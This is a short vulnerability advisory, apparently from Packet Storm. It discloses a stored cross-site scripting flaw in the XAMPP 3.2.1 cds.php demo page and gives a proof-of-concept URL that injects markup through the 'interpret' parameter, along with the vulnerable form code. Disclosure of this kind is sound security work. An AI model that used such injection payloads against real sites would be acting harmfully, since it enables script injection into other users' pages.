XAMPP version 3.2.1 suffers from a cross site scripting vulnerability.
7e4de4aa57bfb79c844e7b693a14cc3809880e3e4222a8e2b4765d28905bc3cf#Title : XAMPP 3.2.1 Cross Site Scripting
#Author : DevilScreaM
#Date : 15 January 2014
#Category : Web Applications
#Vendor : http://sourceforge.net/projects/xampp
#Version : 3.2.1
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows
#Vulnerabillity : Cross Site Scripting
Cross Site Scripting
Exploit & POC
http://localhost/xampp/cds.php?interpret=[YOUR_XSS]&titel=title&jahr=title
Example
http://localhost/xampp/cds.php?interpret=<h1>DevilScreaM</h1>&titel=title&jahr=title
View Cross Site Scripting at
http://localhost/xampp/cds-fpdf.php
Vulnerabillity at Code
<tr><td><?php print $TEXT['cds-attrib1']; ?>:</td><td><input type=text size=30 name=interpret></td></tr>
<tr><td><?php print $TEXT['cds-attrib2']; ?>:</td><td> <input type=text size=30 name=titel></td></tr>
<tr><td><?php print $TEXT['cds-attrib3']; ?>:</td><td> <input type=text size=5 name=jahr></td></tr>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed